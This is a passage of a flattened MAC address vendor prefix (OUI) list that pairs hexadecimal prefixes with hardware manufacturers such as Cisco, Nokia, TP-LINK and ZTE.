Pintsch Tiefenbach GmbH 28FC51 The Electric Controller and Manufacturing Co., LLC 407496 aFUN TECHNOLOGY INC. 701D7F Comtech Technology Co., Ltd. 705986 OOO TTV 844F03 Ablelink Electronics Ltd 906717 Alphion India Private Limited 6064A1 RADiflow Ltd. 58B961 SOLEM Electronique 0C473D Hitron Technologies. Inc 8CCDA2 ACTP, Inc. 84262B Nokia 986CF5 zte corporation 447BC4 DualShine Technology(SZ)Co.,Ltd 9C039E Beijing Winchannel Software Technology Co., Ltd 680AD7 Yancheng Kecheng Optoelectronic Technology Co., Ltd BC8893 VILLBAU Ltd. 706173 Calantec GmbH 7C49B9 Plexus Manufacturing Sdn Bhd 9CF8DB shenzhen eyunmei technology co,.ltd 20D21F Wincal Technology Corp. F89550 Proton Products Chengdu Ltd 58639A TPL SYSTEMES 187ED5 shenzhen kaism technology Co. Ltd 841B38 Shenzhen Excelsecu Data Technology Co.,Ltd 4CCBF5 zte corporation 44700B IFFU 54A54B NSC Communications Siberia Ltd BC2B6B Beijing Haier IC Design Co.,Ltd 98D331 Shenzhen Bolutek Technology Co.,Ltd. 38EC11 Novatek Microelectronics Corp. 1C4158 Gemalto M2M GmbH 9C2840 Discovery Technology,LTD.. 1C7B21 Sony Mobile Communications Inc E0AF4B Pluribus Networks, Inc. 840F45 Shanghai GMT Digital Technologies Co., Ltd 2C5FF3 Pertronic Industries 78491D The Will-Burt Company F46ABC Adonit Corp. Ltd. 28C671 Yota Devices OY D86960 Steinsvik 08EF3B MCS Logic Inc. E8EADA Denkovi Assembly Electronics LTD F85BC9 M-Cube Spa 7CB77B Paradigm Electronics Inc B0CE18 Zhejiang shenghui lighting co.,Ltd 6CF97C Nanoptix Inc. F8FF5F Shenzhen Communication Technology Co.,Ltd 102279 ZeroDesktop, Inc. 7C1AFC Dalian Co-Edifice Video Technology Co., Ltd F47A4E Woojeon&Handan 04848A 7INOVA TECHNOLOGY LIMITED EC2257 JiangSu NanJing University Electronic Information Technology Co.,Ltd F037A1 Huike Electronics (SHENZHEN) CO., LTD. 704CED TMRG, Inc. F08EDB VeloCloud Networks C0A39E EarthCam, Inc. 109AB9 Tosibox Oy 142D8B Incipio Technologies, Inc 68EE96 Cisco SPVTG 78D38D HONGKONG YUNLINK TECHNOLOGY LIMITED DCAE04 CELOXICA Ltd 8005DF Montage Technology Group Limited 681D64 Sunwave Communications Co., Ltd 4C21D0 Sony Mobile Communications Inc 907A0A Gebr. Bode GmbH & Co KG A0C6EC ShenZhen ANYK Technology Co.,LTD 78E8B6 zte corporation 1078CE Hanvit SI, Inc. D8DA52 APATOR S.A. 587A4D Stonesoft Corporation 84E629 Bluwan SA C47F51 Inventek Systems A897DC IBM CCD29B Shenzhen Bopengfa Elec&Technology CO.,Ltd A09BBD Total Aviation Solutions Pty Ltd D40BB9 Solid Semecs bv. F415FD Shanghai Pateo Electronic Equipment Manufacturing Co., Ltd. 70E027 HONGYU COMMUNICATION TECHNOLOGY LIMITED FC35E6 Visteon corp E8481F Advanced Automotive Antennas 3495DB Logitec Corporation 9CB793 Creatcomm Technology Inc. 5C335C Swissphone Telecom AG 04DF69 Car Connectivity Consortium 78DAB3 GBO Technology 700FEC Poindus Systems Corp. F02405 OPUS High Technology Corporation D41090 iNFORM Systems AG 78D5B5 NAVIELEKTRO KY E47D5A Beijing Hanbang Technology Corp. E4F7A1 Datafox GmbH 105C3B Perma-Pipe, Inc. 349D90 Heinzmann GmbH & CO. KG D862DB Eno Inc. C47DFE A.N. Solutions GmbH CCBD35 Steinel GmbH 6CECA1 SHENZHEN CLOU ELECTRONICS CO. LTD. B03850 Nanjing CAS-ZDC IOT SYSTEM CO.,LTD 748E08 Bestek Corp. 78F5E5 BEGA Gantenbrink-Leuchten KG 8C3C07 Skiva Technologies, Inc. 38A86B Orga BV F07765 Sourcefire, Inc 1441E2 Monaco Enterprises, Inc. ECD040 GEA Farm Technologies GmbH F80DEA ZyCast Technology Inc. B08807 Strata Worldwide 249504 SFR F45842 Boxx TV Ltd 106682 NEC Platforms, Ltd. 246278 sysmocom - systems for mobile communications GmbH F084C9 zte corporation D4016D TP-LINK TECHNOLOGIES CO.,LTD. 985C93 SBG Systems SAS A08A87 HuiZhou KaiYue Electronic Co.,Ltd 28CD9C Shenzhen Dynamax Software Development Co.,Ltd. C0C3B6 Automatic Systems A0EB76 AirCUVE Inc. FC4499 Swarco LEA d.o.o. DC647C C.R.S. iiMotion GmbH 148692 TP-LINK TECHNOLOGIES CO.,LTD. A8154D TP-LINK TECHNOLOGIES CO.,LTD. 5CF370 CC&C Technologies, Inc A4E0E6 FILIZOLA S.A. PESAGEM E AUTOMACAO 381766 PROMZAKAZ LTD. 18E8DD MODULETEK D073D5 LIFI LABS MANAGEMENT PTY LTD 149448 BLU CASTLE S.A. 48F925 Maestronic 386793 Asia Optical Co., Inc. 0C8268 TP-LINK TECHNOLOGIES CO.,LTD. D81EDE B&W Group Ltd 24EA40 Helmholz GmbH & Co. KG D429EA Zimory GmbH 34ADE4 Shanghai Chint Power Systems Co., Ltd. 3C94D5 Juniper Networks 68831A Pandora Mobility Corporation FCDB96 ENERVALLEY CO., LTD 1423D7 EUTRONIX CO., LTD. DC6F08 Bay Storage Technology 90DA4E AVANU 281878 Microsoft Corporation 7038B4 Low Tech Solutions 745F00 Samsung Semiconductor Inc. E0C3F3 zte corporation 5C20D0 Asoni Communication Co., Ltd. ACA430 Peerless AV 847A88 HTC Corporation A4D856 Gimbal, Inc 785517 SankyuElectronics B47F5E Foresight Manufacture (S) Pte Ltd A0FE91 AVAT Automation GmbH 74ECF1 Acumen 5809E5 Kivic Inc. 504F94 Loxone Electronics GmbH 60B185 ATH system BC629F Telenet Systems P. Ltd. 380FE4 Dedicated Network Partners Oy 48F230 Ubizcore Co.,LTD 78324F Millennium Group, Inc. 384369 Patrol Products Consortium LLC 44184F Fitview 84ACA4 Beijing Novel Super Digital TV Technology Co., Ltd 541FD5 Advantage Electronics ACE97F IoT Tech Limited E85AA7 LLC Emzior 9C9C1D Starkey Labs Inc. D0D6CC Wintop 58D071 BW Broadcast 1C52D6 FLAT DISPLAY TECHNOLOGY CORPORATION D0DFB2 Genie Networks Limited 386645 OOSIC Technology CO.,Ltd B85AF7 Ouya, Inc 34F62D SHARP Corporation 4C8FA5 Jastec 84ED33 BBMC Co.,Ltd E82E24 Out of the Fog Research LLC 80FA5B CLEVO CO. C0B339 Comigo Ltd. 20858C Assa 60CDC5 Taiwan Carol Electronics., Ltd D8182B Conti Temic Microelectronic GmbH 80CF41 Lenovo Mobile Communication Technology Ltd. 9CE1D6 Junger Audio-Studiotechnik GmbH 48B9C2 Teletics Inc. 58D6D3 Dairy Cheq Inc 046E49 TaiYear Electronic Technology (Suzhou) Co., Ltd 2C3BFD Netstor Technology Co., Ltd. AC3CB4 Nilan A/S B49DB4 Axion Technologies Inc. ACE87E Bytemark Computer Consulting Ltd 8007A2 Esson Technology Inc. C0A0E2 Eden Innovations 080FFA KSP INC. E8ABFA Shenzhen Reecam Tech.Ltd. DCB058 Bürkert Werke GmbH 6C5A34 Shenzhen Haitianxiong Electronic Co., Ltd. 9038DF Changzhou Tiannengbo System Co. Ltd. 185253 Pixord Corporation 683B1E Countwise LTD ACA22C Baycity Technologies Ltd 303294 W-IE-NE-R Plein & Baus GmbH 7C822D Nortec 10FBF0 KangSheng LTD. 6C9AC9 Valentine Research, Inc. AC8D14 Smartrove Inc 2091D9 I'M SPA AC7236 Lexking Technology Co., Ltd. 3CD7DA SK Mtek microelectronics(shenzhen)limited 04F8C2 Flaircomm Microelectronics, Inc. 141BF0 Intellimedia Systems Ltd 5887E2 Shenzhen Coship Electronics Co., Ltd. 6869F2 ComAp s.r.o. B85AFE Handaer Communication Technology (Beijing) Co., Ltd F46DE2 zte corporation F0ACA4 HBC-radiomatic 60748D Atmaca Elektronik B8B7D7 2GIG Technologies 808287 ATCOM Technology Co.Ltd. 28A186 enblink 503955 Cisco SPVTG 78D129 Vicos 84DF0C NET2GRID BV 388EE7 Fanhattan LLC 5CD41B UCZOON Technology Co., LTD CCE798 My Social Stuff A036F0 Comprehensive Power 180CAC CANON INC. 78AB60 ABB Australia 8482F4 Beijing Huasun Unicreate Technology Co., Ltd 00DB1E Albedo Telecom SL 18863A DIGITAL ART SYSTEM 0CDCCC Inala Technologies 98291D Jaguar de Mexico, SA de CV 34AF2C Nintendo Co., Ltd. 7CD9FE New Cosmos Electric Co., Ltd. E49069 Rockwell Automation CCC104 Applied Technical Systems A4B1E9 Technicolor 60455E Liptel s.r.o. D806D1 Honeywell Fire System (Shanghai) Co,. Ltd. 647657 Innovative Security Designs 907025 Garea Microsys Co.,Ltd. 10D1DC INSTAR Deutschland GmbH 34996F VPI Engineering 944A09 BitWise Controls BC28D6 Rowley Associates Limited 10BD18 Cisco Systems, Inc 5869F9 Fusion Transactive Ltd. D41E35 TOHO Electronics INC. 4C72B9 PEGATRON CORPORATION 2CEDEB Alpheus Digital Company Limited 0CD996 Cisco Systems, Inc 30F33A +plugg srl 0C57EB Mueller Systems 745327 COMMSEN CO., LIMITED D08CFF UPWIS AB 68CE4E L-3 Communications Infrared Products 68D1FD Shenzhen Trimax Technology Co.,Ltd 9C066E Hytera Communications Corporation Limited 3CEAFB NSE AG 8CC7AA Radinet Communications Inc. 40336C Godrej & Boyce Mfg. co. ltd F8A03D Dinstar Technologies Co., Ltd. 2CD444 FUJITSU LIMITED BC811F Ingate Systems D867D9 Cisco Systems, Inc A4E731 Nokia Corporation 98A7B0 MCST ZAO 4C068A Basler Electric Company E856D6 NCTech Ltd C08170 Effigis GeoSolutions 642216 Shandong Taixin Electronic co.,Ltd 443839 Cumulus Networks, inc 048B42 Skspruce Technologies 5076A6 Ecil Informatica Ind. Com. Ltda A44C11 Cisco Systems, Inc 60843B Soladigm, Inc. AC4BC8 Juniper Networks 209BA5 JIAXING GLEAD Electronics Co.,Ltd A0F450 HTC Corporation 6089B1 Key Digital Systems 44D15E Shanghai Kingto Information Technology Ltd 0036FE SuperVision 709E86 X6D Limited A0F419 Nokia Corporation 1C973D PRICOM Design BC0200 Stewart Audio 489153 Weinmann Geräte für Medizin GmbH + Co. KG AC9403 Envision Peripherals Inc 68D925 ProSys Development Services 848D84 Rajant Corporation 54466B Shenzhen CZTIC Electronic Technology Co., Ltd 44B382 Kuang-chi Institute of Advanced Technology 60B933 Deutron Electronics Corp. 0043FF KETRON S.R.L. 7CACB2 Bosch Software Innovations GmbH 18D66A Inmarsat 1C7C45 Vitek Industrial Video Products, Inc. 3C3888 ConnectQuest, llc 48D7FF BLANKOM Antennentechnik GmbH C47130 Fon Technology S.L. D8337F Office FA.com Co.,Ltd. 0036F8 Conti Temic microelectronic GmbH A4F7D0 LAN Accessories Co., Ltd. C85645 Intermas France 44348F MXT INDUSTRIAL LTDA D4EC0C Harley-Davidson Motor Company 28E608 Tokheim 74FF7D Wren Sound Systems, LLC ACF0B2 Becker Electronics Taiwan Ltd. 542A9C LSY Defense, LLC. 504A5E Masimo Corporation 6CA96F TransPacket AS AC0142 Uriel Technologies SIA C47BA3 NAVIS Inc. F44848 Amscreen Group Ltd 50D274 Steffes Corporation C8F704 Building Block Video 508A42 Uptmate Technology Co., LTD BCEA2B CityCom GmbH 0CA138 Blinq Wireless Inc. 5C6F4F S.A. SISTEL 901B0E Fujitsu Technology Solutions GmbH F85063 Verathon 2C36F8 Cisco Systems, Inc 845787 DVR C&C Co., Ltd. 5808FA Fiber Optic & telecommunication INC. AC3D05 Instorescreen Aisa 286094 CAPELEC A45630 Cisco Systems, Inc C43C3C CYBELEC SA B826D4 Furukawa Industrial S.A. Produtos Elétricos B87447 Convergence Technologies 7463DF VTS GmbH BC125E BeijingWisVideoINC. 14E4EC mLogic LLC 3828EA Fujian Netcom Technology Co., LTD D01AA7 UniPrint 846AED Wireless Tsukamoto.,co.LTD E05DA6 Detlef Fink Elektronik & Softwareentwicklung 045A95 Nokia Corporation 04F4BC Xena Networks 80DB31 Power Quotient International Co., Ltd. 1C51B5 Techaya LTD 6C3A84 Shenzhen Aero-Startech. Co.Ltd 00D632 GE Energy 0C9E91 Sankosha Corporation 383F10 DBL Technology Ltd. ACD364 ABB SPA, ABB SACE DIV. 2CEE26 Petroleum Geo-Services C8F9F9 Cisco Systems, Inc A4EF52 Telewave Co., Ltd. A826D9 HTC Corporation 28940F Cisco Systems, Inc B8DAF7 Advanced Photonics, Inc. 143AEA Dynapower Company LLC A086EC SAEHAN HITEC Co., Ltd 942E17 Schneider Electric Canada Inc C46044 Everex Electronics Limited 98FE03 Ericsson - North America E03C5B SHENZHEN JIAXINJIE ELECTRON CO.,LTD CC944A Pfeiffer Vacuum GmbH 0C8525 Cisco Systems, Inc B4D8A9 BetterBots 7CC8D7 Damalisk 9CB008 Ubiquitous Computing Technology Corporation A8776F Zonoff 648788 Juniper Networks 00FA3B CLOOS ELECTRONIC GMBH 541DFB Freestyle Energy Ltd 60B606 Phorus 9092B4 Diehl BGT Defence GmbH & Co. KG 20AA4B Cisco-Linksys, LLC CC6DEF TJK Tietolaite Oy A85BF3 Audivo GmbH B8975A BIOSTAR Microtech Int'l Corp. 4833DD ZENNIO AVANCE Y TECNOLOGIA, S.L. 087572 Obelux Oy 10C2BA UTT Co., Ltd. 90D74F Bookeen 64C5AA South African Broadcasting Corporation 98AAD7 BLUE WAVE NETWORKING CO LTD 9C53CD ENGICAM s.r.l. 608645 Avery Weigh-Tronix, LLC FC8FC4 Intelligent Technology Inc. 10FC54 Shany Electronic Co., Ltd. C02973 Audyssey Laboratories Inc. 78FE3D Juniper Networks 2838CF Gen2wave 24BC82 Dali Wireless, Inc. B40C25 Palo Alto Networks F8F7D3 International Communications Corporation 28D1AF Nokia Corporation 24C0B3 RSF FC455F JIANGXI SHANSHUI OPTOELECTRONIC TECHNOLOGY CO.,LTD F04A2B PYRAMID Computer GmbH 302DE8 JDA, LLC (JDA Systems) 48A6D2 GJsun Optical Science and Tech Co.,Ltd. 500B32 Foxda Technology Industrial(ShenZhen)Co.,LTD 603553 Buwon Technology E039D7 Plexxi, Inc. 7C336E MEG Electronics Inc. D4E33F Nokia 68CD0F U Tek Company Limited 603FC5 COX CO., LTD A4E391 DENY FONTAINE AC6FD9 Valueplus Inc. DC1EA3 Accensus LLC A40130 ABIsystems Co., LTD 90A783 JSW PACIFIC CORPORATION F8462D SYNTEC Incorporation 78A5DD Shenzhen Smarteye Digital Electronics Co., Ltd ECE744 Omntec mfg. inc 28AF0A Sirius XM Radio Inc 5CD4AB Zektor 08FC52 OpenXS BV 4C32D9 M Rutty Holdings Pty. Ltd. 08A12B ShenZhen EZL Technology Co., Ltd A00CA1 SKTB SKiT 64E84F Serialway Communication Technology Co. Ltd 2C9EFC CANON INC. 182B05 8D Technologies 240BB1 KOSTAL Industrie Elektrik GmbH 20EEC6 Elefirst Science & Tech Co ., ltd E01E07 Anite TelecomsUS. Inc 7C6B33 Tenyu Tech Co. Ltd. 147DC5 Murata Manufacturing Co., Ltd. 00B9F6 Shenzhen Super Rich Electronics Co.,Ltd FCC23D Atmel Corporation 88E7A6 iKnowledge Integration Corp. A446FA AmTRAN Video Corporation CCE7DF American Magnetics, Inc. 2804E0 FERMAX ELECTRONICA S.A.U. 644346 GuangDong Quick Network Computer CO.,LTD D4024A Delphian Systems LLC 0041B4 Wuxi Zhongxing Optoelectronics Technology Co.,Ltd. F44450 BND Co., Ltd. 0462D7 ALSTOM HYDRO FRANCE D4507A CEIVA Logic, Inc 64D989 Cisco Systems, Inc 645DD7 Shenzhen Lifesense Medical Electronics Co., Ltd. EC4670 Meinberg Funkuhren GmbH & Co. KG D05A0F I-BT DIGITAL CO.,LTD EC9681 2276427 Ontario Inc 5C076F Thought Creator 3C0FC1 KBC Networks 58E636 EVRsafe Technologies 10F9EE Nokia Corporation 742B0F Infinidat Ltd. C8F981 Seneca s.r.l. 24497B Innovative Converged Devices Inc 98E79A Foxconn(NanJing) Communication Co.,Ltd. A0E9DB Ningbo FreeWings Technologies Co.,Ltd 788973 CMC 14307A Avermetrics A06CEC RIM 203706 Cisco Systems, Inc F4B164 Lightning Telecommunications Technology Co. Ltd 70B035 Shenzhen Zowee Technology Co., Ltd 8821E3 Nebusens, S.L. 90B97D Johnson Outdoors Marine Electronics d/b/a Minnkota 7CF429 NUUO Inc. CCB55A Fraunhofer ITWM AC8ACD ROGER D.Wensker, G.Wensker sp.j. 984246 SOL INDUSTRY PTE., LTD 3429EA MCD ELECTRONICS SP. Z O.O. 8C82A8 Insigma Technology Co.,Ltd 60190C RRAMAC D05FCE Hitachi Data Systems F80332 Khomp 28A574 Miller Electric Mfg. Co. 1045BE Norphonic AS 90B8D0 Joyent, Inc. AC4723 Genelec E8BA70 Cisco Systems, Inc D4A425 SMAX Technology Co., Ltd. 281471 Lantis co., LTD. 24470E PentronicAB D09B05 Emtronix 8C11CB ABUS Security-Center GmbH & Co. KG FC8329 Trei technics 14EB33 BSMediasoft Co., Ltd. F4B549 Xiamen Yeastar Information Technology Co., Ltd. 88B168 Delta Control GmbH 68876B INQ Mobile Limited 1CAA07 Cisco Systems, Inc 685B36 POWERTECH INDUSTRIAL CO., LTD. 28EE2C Frontline Test Equipment 782EEF Nokia Corporation 7CF0BA Linkwell Telesystems Pvt Ltd AC8674 Open Mesh, Inc. 64D241 Keith & Koep GmbH 18B79E Invoxia 8C4435 Shanghai BroadMobi Communication Technology Co., Ltd. F81D93 Longdhua(Beijing) Controls Technology Co.,Ltd 94D93C ENELPS B8BEBF Cisco Systems, Inc 64B64A ViVOtech, Inc. 38D135 EasyIO Corporation Sdn. Bhd. CCF841 Lumewave 30EB25 INTEK DIGITAL 44E4D9 Cisco Systems, Inc ACCA54 Telldus Technologies AB 901900 SCS SA D45D42 Nokia Corporation B03829 Siliconware Precision Industries Co., Ltd. 7C6C39 PIXSYS SRL 18B3BA Netlogic AB 8C5FDF Beijing Railway Signal Factory D47B75 HARTING Electronics GmbH D8DF0D beroNet GmbH ACF97E ELESYS INC. 204005 feno GmbH D46F42 WAXESS USA Inc 300B9C Delta Mobile Systems, Inc. 6CAD3F Hubbell Building Automation, Inc. B01B7C Ontrol A.S. 04C5A4 Cisco Systems, Inc BC2846 NextBIT Computing Pvt. Ltd. BC0F2B FORTUNE TECHGROUP CO.,LTD 648125 Alphatron Marine BV 8CF9C9 MESADA Technology Co.,Ltd. C0626B Cisco Systems, Inc 94E226 D. ORtiz Consulting, LLC D8C99D EA DISPLAY LIMITED 1083D2 Microseven Systems, LLC 34684A Teraworks Co., Ltd. CCFC6D RIZ TRANSMITTERS E03E7D data-complex GmbH 0CC6AC DAGS 042605 GFR Gesellschaft für Regelungstechnik und Energieeinsparung mbH 24F0FF GHT Co., Ltd. 9CC0D2 Conductix-Wampfler GmbH CCF67A Ayecka Communication Systems LTD 8065E9 BenQ Corporation EC986C Lufft Mess- und Regeltechnik GmbH D093F8 Stonestreet One LLC 9C645E Harman Consumer Group 1C334D ITS Telecom DCD87F Shenzhen JoinCyber Telecom Equipment Ltd B4E0CD Fusion-io, Inc 286046 Lantech Communications Global, Inc. 10E2D5 Qi Hardware Inc. 60C980 Trymus A036FA Ettus Research LLC EC836C RM Tech Co., Ltd. 303955 Shenzhen Jinhengjia Electronic Co., Ltd. FC5B24 Weibel Scientific A/S 78593E RAFI GmbH & Co.KG 509772 Westinghouse Digital 503DE5 Cisco Systems, Inc 540496 Gigawave LTD EC4644 TTK SAS 4CB9C8 CONET CO., LTD. 8CB64F Cisco Systems, Inc 204AAA Hanscan Spain S.A. 20FECD System In Frontier Inc. F0933A NxtConect B8415F ASP AG 2CB69D RED Digital Cinema 582F42 Universal Electric Corporation 0474A1 Aligera Equipamentos Digitais Ltda 5C6984 NUVICO 70DDA1 Tellabs 94D019 Cydle Corp. 8C278A Vocollect Inc CC0CDA Miljovakt AS E41C4B V2 TECHNOLOGY, INC. 5CF3FC IBM Corp A86A6F RIM 68122D Special Instrument Development Co., Ltd. 94F720 Tianjin Deviser Electronics Instrument Co., Ltd DC9C52 Sapphire Technology Limited. 4891F6 Shenzhen Reach software technology CO.,LTD 649B24 V Technology Co., Ltd. 846EB1 Park Assist LLC 6C504D Cisco Systems, Inc B8D06F GUANGZHOU HKUST FOK YING TUNG RESEARCH INSTITUTE EC14F6 BioControl AS E8995A PiiGAB, Processinformation i Goteborg AB 401D59 Biometric Associates, LP B8FF6F Shanghai Typrotech Technology Co.Ltd 1CBD0E Amplified Engineering Pty Ltd A0F217 GE Medical System(China) Co., Ltd. F0A764 GST Co., Ltd. 1C0656 IDY Corporation 500E6D TrafficCast International EC3BF0 NovelSat 4CEDDE ASKEY COMPUTER CORP E8E08F GRAVOTECH MARKING SAS ACAB8D Lyngso Marine A/S 6083B2 GkWare e.K. 80D019 Embed, Inc 68EBC5 Angstrem Telecom A0B5DA HongKong THTF Co., Ltd 8886A0 Simton Technologies, Ltd. A45055 BUSWARE.DE A89B10 inMotion Ltd. B41489 Cisco Systems, Inc A4A80F Shenzhen Coship Electronics Co., Ltd. F8B599 Guangzhou CHNAVS Digital Technology Co.,Ltd B8921D BG T&A D08999 APCON, Inc. C88447 Beautiful Enterprise Co., Ltd 54FDBF Scheidt & Bachmann GmbH D0BB80 SHL Telemedicine International Ltd. 5C17D3 LGE 1CDF0F Cisco Systems, Inc 68BDAB Cisco Systems, Inc 9CADEF Obihai Technology, Inc. C88B47 Nolangroup S.P.A con Socio Unico C4CD45 Beijing Boomsense Technology CO.,LTD. 8CE7B3 Sonardyne International Ltd 088DC8 Ryowa Electronics Co.,Ltd 80C6CA Endian s.r.l. 7076F0 LevelOne Communications (India) Private Limited C02BFC iNES. applied informatics GmbH 94C7AF Raylios Technology D81C14 Compacta International, Ltd. 008C10 Black Box Corp. 90903C TRISON TECHNOLOGY CORPORATION E061B2 HANGZHOU ZENOINTEL TECHNOLOGY CO., LTD 9411DA ITF Fröschl GmbH 8039E5 PATLITE CORPORATION DC7B94 Cisco Systems, Inc 5CCA32 Theben AG 7415E2 Tri-Sen Systems Corporation ECC38A Accuenergy (CANADA) Inc D48FAA Sogecam Industrial, S.A. B081D8 I-sys Corp 14FEAF SAGITTAR LIMITED B0B8D5 Nanjing Nengrui Auto Equipment CO.,Ltd 94E711 Xirka Dama Persada PT 6C9B02 Nokia Corporation 641E81 Dowslake Microsystems EC542E Shanghai XiMei Electronic Technology Co. Ltd FCD4F6 Messana Air.Ray Conditioning s.r.l. D466A8 Riedo Networks Ltd F0E5C3 Drägerwerk AG & Co. KG aA D82986 Best Wish Technology LTD 446132 ecobee inc F41F0B YAMABISHI Corporation A082C7 P.T.I Co.,LTD 043604 Gyeyoung I&T A4B2A7 Adaxys Solutions AG D0D0FD Cisco Systems, Inc E05B70 Innovid, Co., Ltd. 141BBD Volex Inc. E87AF3 S5 Tech S.r.l. CC5C75 Weightech Com. Imp. Exp. Equip. Pesagem Ltda 1C6F65 GIGA-BYTE TECHNOLOGY CO.,LTD. 90E0F0 IEEE 1722a Working Group 40520D Pico Technology 807D1B Neosystem Co. Ltd. 18B209 Torrey Pines Logic, Inc D84B2A Cognitas Technologies, Inc. 684B88 Galtronics Telemetry Inc. 98FC11 Cisco-Linksys, LLC 34E0D7 DONGGUAN QISHENG ELECTRONICS INDUSTRIAL CO., LTD D84606 Silicon Valley Global Marketing F8AC6D Deltenna Ltd F450EB Telechips Inc 988EDD TE Connectivity Limerick A4AE9A Maestro Wireless Solutions ltd. C848F5 MEDISON Xray Co., Ltd 78A714 Amphenol F893F3 VOLANS 7866AE ZTEC Instruments, Inc. 4C022E CMR KOREA CO., LTD 34AAEE Mikrovisatos Servisas UAB 44D63D Talari Networks 78A2A0 Nintendo Co., Ltd. 48FCB8 Woodstream Corporation D4000D Phoenix Broadband Technologies, LLC. AC5135 MPI TECH 74B9EB JinQianMao Technology Co.,Ltd. D45297 nSTREAMS Technologies, Inc. 1880CE Barberry Solutions Ltd 24B6B8 FRIEM SPA A4561B MCOT Corporation 80C63F Remec Broadband Wireless , LLC 40D40E Biodata Ltd 0C826A Wuhan Huagong Genuine Optics Technology Co., Ltd E0271A TTC Next-generation Home Network System WG 0097FF Heimann Sensor GmbH E4AB46 UAB Selteka 945B7E TRILOBIT LTDA. 04E548 Cohda Wireless Pty Ltd 7071BC PEGATRON CORPORATION 7884EE INDRA ESPACIO S.A. 7C051E RAFAEL LTD. 10090C Janome Sewing Machine Co., Ltd. E01CEE Bravo Tech, Inc. 2893FE Cisco Systems, Inc F4C795 WEY Elektronik AG 781185 NBS Payment Solutions Inc. D05875 Active Control Technology Inc. C8EF2E Beijing Gefei Tech. Co., Ltd 08F6F8 GET Engineering 3C4C69 Infinity System S.L. 7830E1 UltraClenz, LLC B09134 Taleo A4C2AB Hangzhou LEAD-IT Information & Technology Co.,Ltd 48AA5D Store Electronic Systems 042F56 ATOCS (Shenzhen) LTD E85E53 Infratec Datentechnik GmbH 88BA7F Qfiednet Co., Ltd. 64DB18 OpenPattern 90A2DA GHEO SA 9889ED Anadem Information Inc. D81BFE TWINLINX CORPORATION FC4463 Universal Audio, Inc 102D96 Looxcie Inc. 5C35DA There Corporation Oy A06986 Wellav Technologies Ltd EC8EAD DLX 34C69A Enecsys Ltd D8AE90 Itibia Technologies B8653B Bolymin, Inc. 38E8DF b gmbh medien + datenbanken 1C129D IEEE PES PSRC/SUB E0CA4D Shenzhen Unistar Communication Co.,LTD 0CC9C6 Samwin Hong Kong Limited 1062C9 Adatis GmbH & Co. KG 60B3C4 Elber Srl 04C880 Samtec Inc F88DEF Tenebraex 042234 Wireless Standard Extensions F0B6EB Poslab Technology Co., Ltd. 80C862 Openpeak, Inc 1C8F8A Phase Motion Control SpA FCCCE4 Ascon Ltd. 5850E6 Best Buy Corporation 3C1CBE JADAK LLC BCD5B6 d2d technologies FC683E Directed Perception, Inc 28E794 Microtime Computer Inc. 0CD502 Westell Technologies Inc. 70828E OleumTech Corporation A438FC Plastic Logic 18FC9F Changhe Electronics Co., Ltd. 94592D EKE Building Technology Systems Ltd CC69B0 Global Traffic Technologies, LLC A0593A V.D.S. Video Display Systems srl CCEA1C DCONWORKSCo., Ltd 7C08D9 Shanghai B-Star Technology Co 2059A0 Paragon Technologies Inc. 38E98C Reco S.p.A. A0BFA5 CORESYS B05B1F THERMO FISHER SCIENTIFIC S.P.A. 24D2CC SmartDrive Systems Inc. 0CEF7C AnaCom Inc ECE9F8 Guang Zhou TRI-SUN Electronics TechnologyCo., Ltd 34CE94 Parsec (Pty) Ltd 34EF8B NTT Communications Corporation 687F74 Cisco-Linksys, LLC D0D286 Beckman Coulter K.K. C4198B Dominion Voting Systems Corporation C83A35 Tenda Technology Co., Ltd. 6C8CDB Otus Technologies Ltd 40F52E Leica Microsystems (Schweiz) AG E4FFDD ELECTRON INDIA 68A1B7 Honghao Mingchuan Technology (Beijing) CO.,Ltd. 0CD7C2 Axium Technologies, Inc. E84ECE Nintendo Co., Ltd. 1045F8 LNT-Automation GmbH DCE71C AUG Elektronik GmbH A870A5 UniComm Inc. F8472D X2gen Digital Corp. Ltd 849000 Arnold & Richter Cine Technik 08184C A. S. Thomas, Inc. 10880F Daruma Telecomunicações e Informática S.A. FC6198 NEC Personal Products, Ltd 74D850 Evrisko Systems 54B620 SUHDOL E&C Co.Ltd. 78C40E H&D Wireless 2C0623 Win Leader Inc. 0C2755 Valuable Techologies Limited 78998F MEDILINE ITALIA SRL 40ECF8 Siemens AG BCB181 SHARP CORPORATION C8873B Net Optics A8CE90 CVC E41F13 IBM Corp 701AED ADVAS CO., LTD. 6465C0 Nuvon, Inc 7C1EB3 2N TELEKOMUNIKACE a.s. 4456B7 Spawn Labs, Inc 44C9A2 Greenwald Industries 906DC8 DLG Automação Industrial Ltda 584CEE Digital One Technologies, Limited 002721 Shenzhen Baoan Fenda Industrial Co., Ltd A07332 Cashmaster International Limited 64C6AF AXERRA Networks Ltd 44568D PNC TechnologiesCo., Ltd. 406186 MICRO-STAR INT'L CO.,LTD 0026F5 XRPLUS Inc. 0026F8 Golden Highway Industry Development Co., Ltd. 0026F4 Nesslab 0026EE TKM GmbH 0026EF Technology Advancement Group, Inc. 0026B2 Setrix GmbH 0026AF Duelco A/S 0026B3 Thales Communications Inc 0026A7 CONNECT SRL 0026A4 Novus Produtos Eletronicos Ltda 0026D8 Magic Point Inc. 0026D6 Ningbo Andy Optoelectronic Co., Ltd. 00270F Envisionnovation Inc 00270A IEE S.A. 002709 Nintendo Co., Ltd. 0026D3 Zeno Information System 0026D1 S Squared Innovations Inc. 0026CB Cisco Systems, Inc 002701 INCOstartec GmbH 0026FB AirDio Wireless, Inc. 00271A Geenovo Technology Ltd. 002714 Grainmustards, Co,ltd. 002715 Rebound Telecom. Co., Ltd 0026E6 Visionhitech Co., Ltd. 0026DF TaiDoc Technology Corp. 00266A ESSENSIUM NV 00266B SHINE UNION ENTERPRISE LIMITED 002667 CARECOM CO.,LTD. 0026A2 Instrumentation Technology Systems 00269F Private 002699 Cisco Systems, Inc 002647 WFE TECHNOLOGY CORP. 002640 Baustem Broadband Technologies, Ltd. 002653 DaySequerra Corporation 00267B GSI Helmholtzzentrum für Schwerionenforschung GmbH 002687 corega K.K 00268D CellTel S.p.A. 002628 companytec automação e controle ltda. 00261F SAE Magnetics (H.K.) Ltd. 00261E QINGBANG ELEC(SZ) CO., LTD 002619 FRC 0025EA Iphion BV 0025F0 Suga Electronics Limited 0025E8 Idaho Technology 0025E4 OMNI-WiFi, LLC 0025FC ENDA ENDUSTRIYEL ELEKTRONIK LTD. STI. 0025FA J&M Analytik AG 002633 MIR - Medical International Research 0025D7 CEDO 0025D8 KOREA MAINTENANCE 0025D2 InpegVision Co., Ltd 002630 